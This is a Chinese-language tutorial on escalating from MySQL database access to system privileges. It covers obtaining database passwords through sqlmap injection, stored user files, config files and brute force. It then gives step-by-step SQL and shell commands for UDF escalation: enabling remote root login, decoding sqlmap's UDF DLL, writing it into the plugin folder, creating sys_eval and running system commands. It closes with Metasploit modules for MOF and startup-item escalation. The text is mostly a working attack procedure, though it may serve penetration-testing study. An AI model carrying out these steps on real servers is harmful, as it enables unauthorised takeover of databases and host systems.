权限提升数据库（基于MySQL的UDF,MOF,启动项提权）

获取数据库权限

如何获取数据库的最高权限用户的密码，常用方法有这些

网站存在高权限SQL注入点
数据库的存储文件或备份文件
网站应用源码中的数据库配置文件
采用工具或脚本爆破

 网站存在高权限SQL注入点

可以通过sqlmap拿到user表的账号密码，密码可能是MD5加密的。可以通过下面网站进行解密md5在线解密破解,md5解密加密 (cmd5.com)

 数据库的存储文件或备份文件

如图，打开C:\phpStudy\MySQL\data\mysql\user.MYD

 可以看到保存了账号密码，通过MD5解密得到密码

网站应用源码中的数据库配置文件

寻找config，inc等配置文件，最有效

采用工具或脚本爆破 

尝试弱密码或默认密码进行爆破

数据库提权

当我们可以通过远程连接拿到了数据库权限后，尝试提权到系统权限，而数据库一般都是高权限运行的，提权得到的权限也会是高权限

UDF提权

UDF（Userdefined function）即用户定义函数，这是MySQL提供给使用者添加新函数的机制

UDF提权的先决条件

获取mysql控制权限：获取了mysql的账号密码，且可以远程登录

mysql具有写入权限，即secure_file_priv的值不为空

开启远程登录

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;    开启远程登录
FLUSH PRIVILEGES;   刷新权限

手动提权及原理

查看MySQL是否有写入文件权限

show global variables like '%secure%';

当secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出，这个提权方法就失效了
当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下
当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制

这里为了实验需要，在配置文件加上这个选项

上传UDF的动态链接库文件

MySQL版本小于5.1导出C:\Windows\System32

MySQL版本大于5.1导出MySQL安装目录的lib\plugin，现在MySQL版本几乎都在这个范围

 select version();查看MySQL版本

select @@basedir;查看MySQL安装目录路径，sql里一个@表示变量引用，@@表示系统变量和全局变量

这里有一个问题，plugin文件可能不存在，这是网上说的一种方法，现在已经不行了

select 'xxx' into dumpfile 'C:\MySQL\lib\plugin::$INDEX_ALLOCATION';

遇到这种情况只能看自己是否能获取到Web权限，比如通过数据库里的账号密码信息，然后手动加上plugin或者尝试不用数据库来提权了

查看插件位置

show variables like 'plugin%';

现在我们需要查看操作系统和数据库的架构情况

select @@version_compile_os, @@version_compile_machine;

dll文件通过在sqlmap来获取

 sqlmap 中 自带这些动态链接库为了防止被误杀都经过编码处理过，不能被直接使用。这里如果后缀名为.so_或dll_的话，就需要解码，如果后缀名为.so或.dll的话就不需要解码即可直接使用 ，sqlmap也自带了解码的py脚本，在/extra/cloak目录下，使用cloak.py解密即可。

 解密命令 python cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

 

 

接下来，就是把dll文件复制到plugin下，注意路径替换为自己的路径，这里需要注意\\，否则可能报错

select hex(load_file('E:\\sqlmap-1.7\\extra\\cloak\\lib_mysqludf_sys_32.dll')) into dumpfile 'C:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll';

写入udf.dll成功 

创建自定义函数

函数已经写好，下一步就是调用的问题了，创建自定义函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否创建成功

select * from mysql.func;

执行系统命令 

select sys_eval('whoami')

MOF提权

MOF提权在2008后因为权限控制而失效

托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。文件路径为：c:/windows/system32/wbme/mof/，其作用是每隔五秒就会去监控进程创建和死亡。MOF文件每五秒就会执行，而且是系统权限，我们通过mysql使用load_file 将文件写入/wbme/mof，然后系统每隔五秒就会执行一次我们上传的MOF。MOF当中有一段是vbs脚本，我们可以通过控制这段vbs脚本的内容让系统执行命令，进行提权

使用方法

使用msf  use exploit/windows/mysql/mysql_mof 

启动项提权 

将木马文件写入目标机器的启动项，当目标机器重启时，启动项里的木马也会一起执行，受到前面的secure_file_priv限制，如果限制了启动项，这种提权方式自然也失败了

 use exploit/windows/mysql/mysql_start_up